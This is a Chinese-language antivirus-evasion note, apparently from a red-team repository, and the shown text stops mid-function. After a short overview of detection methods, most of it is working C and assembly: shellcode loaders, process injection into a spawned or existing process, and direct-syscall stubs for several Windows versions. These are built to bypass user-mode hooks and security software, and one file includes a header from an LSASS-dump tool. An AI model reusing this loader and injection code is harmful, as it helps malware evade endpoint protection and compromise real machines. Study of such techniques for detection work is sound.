Author: Boi@Linton Lab 360

目前的反病毒安全软件,常见有三种,一种基于特征,一种基于行为,一种基于云查杀。云查杀的特点基本也可以概括为特征查杀。

对特征来讲,大多数杀毒软件会定义一个阈值,当文件内部的特征数量达到一定程度就会触发报警,也不排除杀软会针对某个 EXP 会限制特定的入口函数来查杀。当然还有通过 md5,sha1 等 hash 函数来识别恶意软件,这也是最简单粗暴,最容易绕过的。 针对特征的免杀较为好做,可以使用加壳改壳、添加 / 替换资源、修改已知特征码 / 会增加查杀概率的单词(比如某函数名为 ExecutePayloadshellcode)、加密 Shellcode 等等。

CreateThread CreateThreadEx

xxx -> ntdll.dll -> win32API

对行为来讲,很多个 API 可能会触发杀软的监控,比如注册表操作、添加启动项、添加服务、添加用户、注入、劫持、创建进程、加载 DLL 等等。 针对行为的免杀,我们可以使用白名单、替换 API、替换操作方式(如使用 WMI/COM 的方法操作文件)等等方法实现绕过。除常规的替换、使用未导出的 API 等姿势外,我们还可以使用通过直接系统调用的方式实现,比如使用内核层面 Zw 系列的 API,绕过杀软对应用层的监控(如下图所示,使用 ZwAllocateVirtualMemory 函数替代 VirtualAlloc)。

Loader tech

CreateThread

  1. int main()
  2. {
  3.     LPVOID lpvAddr = VirtualAlloc(0, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  4.     unsigned char data[] = "\x00\x48\x83";
  5.     char a1[] = "\xfc\xe4\xc8";
  7.     SIZE_T Size = sizeof(data);
  9.     //decrypt
  10.     for (int i = 0; i < sizeof(a1); i++) {
  11.         memcpy(&data[i * 3], &a1[i], 1);
  12.     }
  14.     RtlMoveMemory(lpvAddr, data, sizeof(data));
  15.     DWORD pa = 0x01;
  16.     VirtualProtect(lpvAddr, sizeof(data), 0x10, &pa);
  18.     if (lpvAddr != NULL) {
  19.         HANDLE s;
  20.         s = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)lpvAddr, data, 0, 0);
  21.         WaitForSingleObject(s, INFINITE);
  22.     }
  23. }

ThreadHijacking

VirtualAllocEx(CreateNewProcess)

  1. char a1[] = "\xfc\xe4\xc8\x00\x41\x51...";
  3. SIZE_T size = 0;
  4. STARTUPINFOEXA si;
  5. PROCESS_INFORMATION pi;
  7. ZeroMemory(&si, sizeof(si));
  8. si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
  9. si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
  11. ZeroMemory(&si, sizeof(si));
  12. si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
  13. si.StartupInfo.dwFlags = STARTF_USESHOWWINDOW;
  15. InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
  17. BOOL success = CreateProcessA(
  18.     NULL,
  19.     (LPSTR)"C:\\Windows\\System32\\mblctr.exe",
  20.     NULL,
  21.     NULL,
  22.     true,
  23.     CREATE_SUSPENDED | EXTENDED_STARTUPINFO_PRESENT,//有扩展启动信息的结构体
  24.     NULL,
  25.     NULL,
  26.     reinterpret_cast<LPSTARTUPINFOA>(&si),
  27.     &pi);
  29. HANDLE notepadHandle = pi.hProcess;
  30. LPVOID remoteBuffer = VirtualAllocEx(notepadHandle, NULL, sizeof data, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
  32. WriteProcessMemory(notepadHandle, remoteBuffer, data, sizeof data, NULL);
  33. HANDLE remoteThread = CreateRemoteThread(notepadHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
  35. if (WaitForSingleObject(remoteThread, INFINITE) == WAIT_FAILED) {
  36.     return 1;
  37. }
  39. if (ResumeThread(pi.hThread) == -1) {
  40.     return 1;
  41. }

VirtualAllocEx(Use existing app)

  1. HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, false, procID);
  2. if (hProc == INVALID_HANDLE_VALUE) {
  3.     printf("Error opening process ID %d\n", procID);
  4.     return 1;
  5. }
  6. void *alloc = VirtualAllocEx(hProc, NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  7. if (alloc == NULL) {
  8.     printf("Error allocating memory in remote process\n");
  9.     return 1;
  10. }
  11. if (WriteProcessMemory(hProc, alloc, shellcode, sizeof(shellcode), NULL) == 0) {
  12.     printf("Error writing to remote process memory\n");
  13.     return 1;
  14. }
  15. HANDLE tRemote = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)alloc, NULL, 0, NULL);
  16. if (tRemote == INVALID_HANDLE_VALUE) {
  17.     printf("Error starting remote thread\n");
  18.     return 1;
  19. }
  20. WaitForSingleObject(tRemote, INFINITE) == WAIT_FAILED

VirtualProtect

  1. // BOOL VirtualProtect(
  2. //   LPVOID lpAddress,
  3. //   SIZE_T dwSize,
  4. //   DWORD  flNewProtect,
  5. //   PDWORD lpflOldProtect
  6. // );
  8. LPVOID lpvAddr = VirtualAlloc(0, 1024, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  9. DWORD pa = 0x01;
  10. VirtualProtect(lpvAddr, sizeof(data), PAGE_EXECUTE, &pa);
  11. //PAGE_EXECUTE 启用对页面的提交区域的执行访问。尝试写入提交的区域会导致访问冲突

sRDI

https://github.com/monoxgas/sRDI

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图1

系统直接调用

Windows 操作系统中实际只使用了两个特权级别:

一个是 Ring3 层,平时我们所见到的应用程序运行在这一层,所以叫它用户层,也叫 User-Mode。所以下次听到别人讲(Ring3、用户层、User-Mode)时,其实是在讲同一个概念。

一个是 Ring0 层,像操作系统内核(Kernel)这样重要的系统组件,以及设备驱动都是运行在 Ring0,内核层,也叫 Kernel-Mode。 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图2

通过这些保护层来隔离普通的用户程序,不能直接访问内存区域,以及运行在内核模式下的系统资源。

当一个用户层程序需要执行一个特权系统操作,或者访问内核资源时。处理器首先需要切换到 Ring0 模式下才能执行后面的操作。

切换 Ring0 的代码,也就是直接系统调用所在的地方。

我们通过监控 Notepad.exe 进程保存一个. txt 文件,来演示一个应用层程序如何切换到内核模式执行的: Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图3

我们可以看到 notepad 调用了 kernel32 模块中的 WriteFile 函数,然后该函数内部又调用了 ntdll 中的 NtWriteFile 来到了 Ring3 与 Ring0 的临界点。

因为程序保存文件到磁盘上,所以操作系统需要访问相关的文件系统和设备驱动。应用层程序自己是不允许直接访问这些需要特权资源的。

应用程序直接访问设备驱动会引起一些意外的后果(当然操作系统不会出事,最多就是应用程序的执行流程出错导致崩溃)。所以,在进入内核层之前,调用的最后一个用户层 API 就是负责切换到内核模式的。

CPU 中通过执行 syscall 指令,来进入内核模式,至少 x64 架构是这样的。

Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图4

把被调用函数相关的参数 PUSH 到栈上以后,ntdll 中的 NtWriteFile 函数的职责就是,设置 EAX 为对应的 “系统调用号”,最后执行 syscall 指令,CPU 就来到了内核模式(Ring0)下执行。

进入内核模式后,内核通过 diapatch table(SSDT),来找到和系统调用号对应的 Kernel API,然后将用户层栈上的参数,拷贝到内核层的栈中,最后调用内核版本的 ZwWriteFile 函数。

当内核函数执行完成时,使用几乎相同的方法回到用户层,并返回内核 API 函数的返回值(指向接收数据的指针或文件句柄)。

Windows 系统架构图 Airboi/bypass-av-note: 免杀技术大杂烩---乱拳也打不死老师傅 - 图5

用户层的应用程序要想和底层系统交互,通常使用应用程序编程接口(Application Programming Interface )也就是所谓的 API。如果你是编写 C/C++ 应用的 Windows 程序开发程序员,通常使用 Win32 API。

Win32API 是微软封装的一套 API 接口,由几个 DLL(所谓的 Win32 子系统 DLL)组成。在 Win32 API 下面使用的是 Naitve API(ntdll.dll),这个才是真正用户层和系统底层交互的接口,一般称为用户层和内核层之间的桥梁。

但是 ntdll 中函数大部分都没有被微软记录到官方的开发文档中,为了兼容性问题,大多数情况在写程序时,应该避免直接使用 ntdll 中的 API。

如何通过编程来绕过 Win32 接口层,直接调用系统 API 并绕过潜在的 Ring3 层 Hook?

system.asm

  1. .code
  3. ; Reference: https://j00ru.vexillium.org/syscalls/nt/64/
  5. ; Windows 7 SP1 / Server 2008 R2 specific syscalls
  7. NtCreateThread7SP1 proc
  8.         mov r10, rcx
  9.         mov eax, 4Bh
  10.         syscall
  11.         ret
  12. NtCreateThread7SP1 endp
  14. ZwOpenProcess7SP1 proc
  15.         mov r10, rcx
  16.         mov eax, 23h
  17.         syscall
  18.         ret
  19. ZwOpenProcess7SP1 endp
  21. ZwClose7SP1 proc
  22.         mov r10, rcx
  23.         mov eax, 0Ch
  24.         syscall
  25.         ret
  26. ZwClose7SP1 endp
  28. ZwWriteVirtualMemory7SP1 proc
  29.         mov r10, rcx
  30.         mov eax, 37h
  31.         syscall
  32.         ret
  33. ZwWriteVirtualMemory7SP1 endp
  35. ZwProtectVirtualMemory7SP1 proc
  36.         mov r10, rcx
  37.         mov eax, 4Dh
  38.         syscall
  39.         ret
  40. ZwProtectVirtualMemory7SP1 endp
  42. ZwQuerySystemInformation7SP1 proc
  43.         mov r10, rcx
  44.         mov eax, 33h
  45.         syscall
  46.         ret
  47. ZwQuerySystemInformation7SP1 endp
  49. NtAllocateVirtualMemory7SP1 proc
  50.         mov r10, rcx
  51.         mov eax, 15h
  52.         syscall
  53.         ret
  54. NtAllocateVirtualMemory7SP1 endp
  56. NtFreeVirtualMemory7SP1 proc
  57.         mov r10, rcx
  58.         mov eax, 1Bh
  59.         syscall
  60.         ret
  61. NtFreeVirtualMemory7SP1 endp
  63. NtCreateFile7SP1 proc
  64.         mov r10, rcx
  65.         mov eax, 52h
  66.         syscall
  67.         ret
  68. NtCreateFile7SP1 endp
  70. ; Windows 8 / Server 2012 specific syscalls
  72. ZwOpenProcess80 proc
  73.         mov r10, rcx
  74.         mov eax, 24h
  75.         syscall
  76.         ret
  77. ZwOpenProcess80 endp
  79. ZwClose80 proc
  80.         mov r10, rcx
  81.         mov eax, 0Dh
  82.         syscall
  83.         ret
  84. ZwClose80 endp
  86. ZwWriteVirtualMemory80 proc
  87.         mov r10, rcx
  88.         mov eax, 38h
  89.         syscall
  90.         ret
  91. ZwWriteVirtualMemory80 endp
  93. ZwProtectVirtualMemory80 proc
  94.         mov r10, rcx
  95.         mov eax, 4Eh
  96.         syscall
  97.         ret
  98. ZwProtectVirtualMemory80 endp
  100. ZwQuerySystemInformation80 proc
  101.         mov r10, rcx
  102.         mov eax, 34h
  103.         syscall
  104.         ret
  105. ZwQuerySystemInformation80 endp
  107. NtAllocateVirtualMemory80 proc
  108.         mov r10, rcx
  109.         mov eax, 16h
  110.         syscall
  111.         ret
  112. NtAllocateVirtualMemory80 endp
  114. NtFreeVirtualMemory80 proc
  115.         mov r10, rcx
  116.         mov eax, 1Ch
  117.         syscall
  118.         ret
  119. NtFreeVirtualMemory80 endp
  121. NtCreateFile80 proc
  122.         mov r10, rcx
  123.         mov eax, 53h
  124.         syscall
  125.         ret
  126. NtCreateFile80 endp
  128. ; Windows 8.1 / Server 2012 R2 specific syscalls
  130. NtCreateThread81 proc
  131.         mov r10, rcx
  132.         mov eax, 4Dh
  133.         syscall
  134.         ret
  135. NtCreateThread81 endp
  137. ZwOpenProcess81 proc
  138.         mov r10, rcx
  139.         mov eax, 25h
  140.         syscall
  141.         ret
  142. ZwOpenProcess81 endp
  144. ZwClose81 proc
  145.         mov r10, rcx
  146.         mov eax, 0Eh
  147.         syscall
  148.         ret
  149. ZwClose81 endp
  151. ZwWriteVirtualMemory81 proc
  152.         mov r10, rcx
  153.         mov eax, 39h
  154.         syscall
  155.         ret
  156. ZwWriteVirtualMemory81 endp
  158. ZwProtectVirtualMemory81 proc
  159.         mov r10, rcx
  160.         mov eax, 4Fh
  161.         syscall
  162.         ret
  163. ZwProtectVirtualMemory81 endp
  165. ZwQuerySystemInformation81 proc
  166.         mov r10, rcx
  167.         mov eax, 35h
  168.         syscall
  169.         ret
  170. ZwQuerySystemInformation81 endp
  172. NtAllocateVirtualMemory81 proc
  173.         mov r10, rcx
  174.         mov eax, 17h
  175.         syscall
  176.         ret
  177. NtAllocateVirtualMemory81 endp
  179. NtFreeVirtualMemory81 proc
  180.         mov r10, rcx
  181.         mov eax, 1Dh
  182.         syscall
  183.         ret
  184. NtFreeVirtualMemory81 endp
  186. NtCreateFile81 proc
  187.         mov r10, rcx
  188.         mov eax, 54h
  189.         syscall
  190.         ret
  191. NtCreateFile81 endp
  193. ; Windows 10 / Server 2016 specific syscalls
  195. ZwOpenProcess10 proc
  196.         mov r10, rcx
  197.         mov eax, 26h
  198.         syscall
  199.         ret
  200. ZwOpenProcess10 endp
  202. ZwClose10 proc
  203.         mov r10, rcx
  204.         mov eax, 0Fh
  205.         syscall
  206.         ret
  207. ZwClose10 endp
  209. ZwWriteVirtualMemory10 proc
  210.         mov r10, rcx
  211.         mov eax, 3Ah
  212.         syscall
  213.         ret
  214. ZwWriteVirtualMemory10 endp
  216. ZwProtectVirtualMemory10 proc
  217.         mov r10, rcx
  218.         mov eax, 50h
  219.         syscall
  220.         ret
  221. ZwProtectVirtualMemory10 endp
  223. ZwQuerySystemInformation10 proc
  224.         mov r10, rcx
  225.         mov eax, 36h
  226.         syscall
  227.         ret
  228. ZwQuerySystemInformation10 endp
  230. NtAllocateVirtualMemory10 proc
  231.         mov r10, rcx
  232.         mov eax, 18h
  233.         syscall
  234.         ret
  235. NtAllocateVirtualMemory10 endp
  237. NtFreeVirtualMemory10 proc
  238.         mov r10, rcx
  239.         mov eax, 1Eh
  240.         syscall
  241.         ret
  242. NtFreeVirtualMemory10 endp
  244. NtCreateFile10 proc
  245.         mov r10, rcx
  246.         mov eax, 55h
  247.         syscall
  248.         ret
  249. NtCreateFile10 endp
  251. NtCreateThread10 proc
  252.         mov r10, rcx
  253.         mov eax, 4Eh
  254.         syscall
  255.         ret
  256. NtCreateThread10 endp
  258. NtCreateThreadEx10 proc
  259.         mov r10, rcx
  260.         mov eax, 0BBh
  261.         syscall
  262.         ret
  263. NtCreateThreadEx10 endp
  265. NtAllocateVirtualMemoryEx10 proc
  266.         mov r10, rcx
  267.         mov eax, 0BBh
  268.         syscall
  269.         ret
  270. NtAllocateVirtualMemoryEx10 endp
  271. end

xx.h

  1. #pragma once
  3. #include <Windows.h>
  5. #define STATUS_SUCCESS 0
  6. #define OBJ_CASE_INSENSITIVE 0x00000040L
  7. #define FILE_OVERWRITE_IF 0x00000005
  8. #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
  9. typedef LONG KPRIORITY;
  11. #define InitializeObjectAttributes( i, o, a, r, s ) {    \
  12.       (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
  13.       (i)->RootDirectory = r;                            \
  14.       (i)->Attributes = a;                               \
  15.       (i)->ObjectName = o;                               \
  16.       (i)->SecurityDescriptor = s;                       \
  17.       (i)->SecurityQualityOfService = NULL;              \
  18.    }
  20. typedef struct _UNICODE_STRING {
  21.     USHORT Length;
  22.     USHORT MaximumLength;
  23.     PWSTR  Buffer;
  24. } UNICODE_STRING, * PUNICODE_STRING;
  26. typedef const UNICODE_STRING* PCUNICODE_STRING;
  28. typedef struct _WIN_VER_INFO {
  29.     WCHAR chOSMajorMinor[8];
  30.     DWORD dwBuildNumber;
  31.     UNICODE_STRING ProcName;
  32.     HANDLE hTargetPID;
  33.     LPCSTR lpApiCall;
  34.     INT SystemCall;
  35. } WIN_VER_INFO, * PWIN_VER_INFO;
  37. typedef struct _OBJECT_ATTRIBUTES {
  38.     ULONG Length;
  39.     HANDLE RootDirectory;
  40.     PUNICODE_STRING ObjectName;
  41.     ULONG Attributes;
  42.     PVOID SecurityDescriptor;
  43.     PVOID SecurityQualityOfService;
  44. } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
  46. typedef struct _CLIENT_ID {
  47.     HANDLE UniqueProcess;
  48.     HANDLE UniqueThread;
  49. } CLIENT_ID, * PCLIENT_ID;
  51. typedef enum _SYSTEM_INFORMATION_CLASS {
  52.     SystemBasicInformation,
  53.     SystemProcessorInformation,
  54.     SystemPerformanceInformation,
  55.     SystemTimeOfDayInformation,
  56.     SystemPathInformation,
  57.     SystemProcessInformation,
  58.     SystemCallCountInformation,
  59.     SystemDeviceInformation,
  60.     SystemProcessorPerformanceInformation,
  61.     SystemFlagsInformation,
  62.     SystemCallTimeInformation,
  63.     SystemModuleInformation
  64. } SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;
  66. typedef struct _INITIAL_TEB
  67. {
  68.     struct
  69.     {
  70.         PVOID OldStackBase;
  71.         PVOID OldStackLimit;
  72.     } OldInitialTeb;
  73.     PVOID StackBase;
  74.     PVOID StackLimit;
  75.     PVOID StackAllocationBase;
  76. } INITIAL_TEB, * PINITIAL_TEB;
  78. typedef struct _SYSTEM_PROCESSES {
  79.     ULONG NextEntryDelta;
  80.     ULONG ThreadCount;
  81.     ULONG Reserved1[6];
  82.     LARGE_INTEGER CreateTime;
  83.     LARGE_INTEGER UserTime;
  84.     LARGE_INTEGER KernelTime;
  85.     UNICODE_STRING ProcessName;
  86.     KPRIORITY BasePriority;
  87.     HANDLE ProcessId;
  88.     HANDLE InheritedFromProcessId;
  89. } SYSTEM_PROCESSES, * PSYSTEM_PROCESSES;
  91. typedef struct _IO_STATUS_BLOCK
  92. {
  93.     union
  94.     {
  95.         LONG Status;
  96.         PVOID Pointer;
  97.     };
  98.     ULONG Information;
  99. } IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;
  102. // Windows 7 SP1 / Server 2008 R2 specific Syscalls
  103. EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation7SP1(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
  104. EXTERN_C NTSTATUS ZwOpenProcess7SP1(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
  105. EXTERN_C NTSTATUS NtFreeVirtualMemory7SP1(HANDLE ProcessHandle, PVOID* BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
  106. EXTERN_C NTSTATUS NtAllocateVirtualMemory7SP1(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
  107. EXTERN_C NTSTATUS ZwProtectVirtualMemory7SP1(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
  108. EXTERN_C NTSTATUS NtCreateThread7SP1(
  109.     OUT PHANDLE ThreadHandle,
  110.     IN  ACCESS_MASK DesiredAccess,
  111.     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  112.     IN  HANDLE ProcessHandle,
  113.     OUT PCLIENT_ID ClientId,
  114.     IN  PCONTEXT ThreadContext,
  115.     IN  PINITIAL_TEB InitialTeb,
  116.     IN  BOOLEAN CreateSuspended
  117. );
  119. // Windows 8 / Server 2012 specific Syscalls
  120. EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
  121. EXTERN_C NTSTATUS NtCreateThread80(
  122.     OUT PHANDLE ThreadHandle,
  123.     IN  ACCESS_MASK DesiredAccess,
  124.     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  125.     IN  HANDLE ProcessHandle,
  126.     OUT PCLIENT_ID ClientId,
  127.     IN  PCONTEXT ThreadContext,
  128.     IN  PINITIAL_TEB InitialTeb,
  129.     IN  BOOLEAN CreateSuspended
  130. );
  132. // Windows 8.1 / Server 2012 R2 specific Syscalls
  133. EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
  134. EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
  135. EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID* BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
  136. EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
  137. EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
  138. EXTERN_C NTSTATUS NtCreateThread81(
  139.     OUT PHANDLE ThreadHandle,
  140.     IN  ACCESS_MASK DesiredAccess,
  141.     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  142.     IN  HANDLE ProcessHandle,
  143.     OUT PCLIENT_ID ClientId,
  144.     IN  PCONTEXT ThreadContext,
  145.     IN  PINITIAL_TEB InitialTeb,
  146.     IN  BOOLEAN CreateSuspended
  147. );
  149. // Windows 10 / Server 2016 specific Syscalls
  150. EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
  151. EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
  152. EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID* BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType);
  153. EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID* BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);
  154. EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection);
  155. EXTERN_C NTSTATUS NtCreateThread10(
  156.     OUT PHANDLE ThreadHandle,
  157.     IN  ACCESS_MASK DesiredAccess,
  158.     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  159.     IN  HANDLE ProcessHandle,
  160.     OUT PCLIENT_ID ClientId,
  161.     IN  PCONTEXT ThreadContext,
  162.     IN  PINITIAL_TEB InitialTeb,
  163.     IN  BOOLEAN CreateSuspended
  164. );
  165. EXTERN_C NTSTATUS NtCreateThreadEx10(
  166.     OUT PHANDLE hThread,
  167.     IN ACCESS_MASK DesiredAccess,
  168.     IN LPVOID ObjectAttributes,
  169.     IN HANDLE ProcessHandle,
  170.     IN LPTHREAD_START_ROUTINE lpStartAddress,
  171.     IN LPVOID lpParameter,
  172.     IN BOOL CreateSuspended,
  173.     IN ULONG StackZeroBits,
  174.     IN ULONG SizeOfStackCommit,
  175.     IN ULONG SizeOfStackReserve,
  176.     OUT LPVOID lpBytesBuffer
  177. );
  178. EXTERN_C NTSTATUS NtAllocateVirtualMemoryEx10(
  179.     _In_opt_ HANDLE Process,
  180.     _In_opt_ PVOID* BaseAddress,
  181.     _In_ SIZE_T* RegionSize,
  182.     _In_ ULONG AllocationType,
  183.     _In_ ULONG PageProtection,
  184.     _Inout_updates_opt_(ParameterCount) MEM_EXTENDED_PARAMETER* Parameters,
  185.     _In_ ULONG ParameterCount
  186. );
  188. NTSTATUS(*NtAllocateVirtualMemoryEx) (
  189.     _In_opt_ HANDLE Process,
  190.     _In_opt_ PVOID* BaseAddress,
  191.     _In_ SIZE_T* RegionSize,
  192.     _In_ ULONG AllocationType,
  193.     _In_ ULONG PageProtection,
  194.     _Inout_updates_opt_(ParameterCount) MEM_EXTENDED_PARAMETER* Parameters,
  195.     _In_ ULONG ParameterCount
  196.     );
  198. NTSTATUS(*NtCreateThreadEx) (
  199.     OUT PHANDLE hThread,
  200.     IN ACCESS_MASK DesiredAccess,
  201.     IN LPVOID ObjectAttributes,
  202.     IN HANDLE ProcessHandle,
  203.     IN LPTHREAD_START_ROUTINE lpStartAddress,
  204.     IN LPVOID lpParameter,
  205.     IN BOOL CreateSuspended,
  206.     IN ULONG StackZeroBits,
  207.     IN ULONG SizeOfStackCommit,
  208.     IN ULONG SizeOfStackReserve,
  209.     OUT LPVOID lpBytesBuffer
  210.     );
  212. NTSTATUS(*NtAllocateVirtualMemory)(
  213.     HANDLE ProcessHandle,
  214.     PVOID* BaseAddress,
  215.     ULONG_PTR ZeroBits,
  216.     PSIZE_T RegionSize,
  217.     ULONG AllocationType,
  218.     ULONG Protect
  219.     );
  221. NTSTATUS(*ZwProtectVirtualMemory)(
  222.     IN HANDLE ProcessHandle,
  223.     IN PVOID* BaseAddress,
  224.     IN SIZE_T* NumberOfBytesToProtect,
  225.     IN ULONG NewAccessProtection,
  226.     OUT PULONG OldAccessProtection
  227.     );
  229. NTSTATUS(*NtFreeVirtualMemory)(
  230.     HANDLE ProcessHandle,
  231.     PVOID* BaseAddress,
  232.     IN OUT PSIZE_T RegionSize,
  233.     ULONG FreeType
  234.     );
  236. NTSTATUS(*ZwOpenProcess)(
  237.     PHANDLE ProcessHandle,
  238.     ACCESS_MASK DesiredAccess,
  239.     POBJECT_ATTRIBUTES ObjectAttributes,
  240.     PCLIENT_ID ClientId
  241.     );
  243. NTSTATUS(WINAPI* ZwQuerySystemInformation)(
  244.     SYSTEM_INFORMATION_CLASS SystemInformationClass,
  245.     PVOID SystemInformation,
  246.     ULONG SystemInformationLength,
  247.     PULONG ReturnLength
  248.     );
  250. NTSTATUS(*NtCreateThread)(
  251.     OUT PHANDLE ThreadHandle,
  252.     IN  ACCESS_MASK DesiredAccess,
  253.     IN  POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
  254.     IN  HANDLE ProcessHandle,
  255.     OUT PCLIENT_ID ClientId,
  256.     IN  PCONTEXT ThreadContext,
  257.     IN  PINITIAL_TEB InitialTeb,
  258.     IN  BOOLEAN CreateSuspended
  259.     );
  261. typedef NTSTATUS(NTAPI* _RtlGetVersion)(
  262.     LPOSVERSIONINFOEXW lpVersionInformation
  263.     );
  265. typedef void (WINAPI* _RtlInitUnicodeString)(
  266.     PUNICODE_STRING DestinationString,
  267.     PCWSTR SourceString
  268.     );
  270. typedef NTSYSAPI BOOLEAN(NTAPI* _RtlEqualUnicodeString)(
  271.     PUNICODE_STRING String1,
  272.     PCUNICODE_STRING String2,
  273.     BOOLEAN CaseInSensitive
  274.     );

xx.c

  1. #undef  _UNICODE
  2. #define _UNICODE
  3. #undef  UNICODE
  4. #define UNICODE
  6. #include <Windows.h>
  7. #include <stdio.h>
  8. #include "Dumpert.h"
  10. #pragma comment (lib, "Dbghelp.lib")
  12. #define RPL_MASK                0x0003
  13. #define MODE_MASK               0x0001
  14. #define KGDT64_NULL             0x0000
  15. #define KGDT64_R0_CODE          0x0010
  16. #define KGDT64_R0_DATA          0x0018
  17. #define KGDT64_R3_CMCODE        0x0020
  18. #define KGDT64_R3_DATA          0x0028
  19. #define KGDT64_R3_CODE          0x0030
  20. #define KGDT64_SYS_TSS          0x0040
  21. #define KGDT64_R3_CMTEB         0x0050
  22. #define KGDT64_R0_LDT           0x0060
  24. DWORD WINAPI StartAddress(LPVOID lpThreadParameter) {
  25.     return ((int(__stdcall*)(LPVOID))lpThreadParameter)(lpThreadParameter);
  26. }
  28. NTSTATUS MyInitTeb(PINITIAL_TEB InitialTeb) {
  29.     PVOID StackBaseAddr = NULL;
  30.     SIZE_T StackSize = 0x1000 * 10;
  31.     NTSTATUS Status;
  33.     Status = NtAllocateVirtualMemory(GetCurrentProcess(),
  34.         (PVOID*)&StackBaseAddr,
  35.         0,
  36.         &StackSize,
  37.         MEM_RESERVE | MEM_COMMIT,
  38.         PAGE_READWRITE);
  40.     if (Status != 0) {
  41.         printf("MyInitStack:%llx\n", Status);
  42.         return Status;
  43.     }
  44.     InitialTeb->StackAllocationBase = (PVOID)StackBaseAddr;
  45.     InitialTeb->StackBase = (PVOID)((INT64)StackBaseAddr + StackSize - 0x1000*5);
  46.     InitialTeb->OldInitialTeb.OldStackBase = NULL;
  47.     InitialTeb->OldInitialTeb.OldStackLimit = NULL;
  48.     InitialTeb->StackLimit = StackBaseAddr;
  49.     return STATUS_SUCCESS;
  50. }
  52. NTSTATUS MyInitContext(
  53.     PCONTEXT pContext,
  54.     PVOID ThreadFuncAddr,
  55.     PVOID FuncArgAddr,
  56.     PVOID StackBaseAddr) {
  57.     // set rsp
  58.     pContext->Rsp = (DWORD64)StackBaseAddr;
  59.     // set ip and rcx
  60.     pContext->Rip = (DWORD64)ThreadFuncAddr;
  61.     pContext->Rcx = (DWORD64)FuncArgAddr;
  62.     // nop
  63.     pContext->Rax = (DWORD64)NULL;
  64.     pContext->Rbx = (DWORD64)NULL;
  65.     pContext->Rdx = (DWORD64)NULL;
  66.     pContext->Rsi = (DWORD64)NULL;
  67.     pContext->Rdi = (DWORD64)NULL;
  68.     pContext->R8 = (DWORD64)NULL;
  69.     pContext->R9 = (DWORD64)NULL;
  71.     // set context flags
  72.     pContext->ContextFlags = CONTEXT_FULL;
  74.     // unknow
  75.     pContext->EFlags = 0x3000;/* IOPL 3 */
  77.     // set seg registers
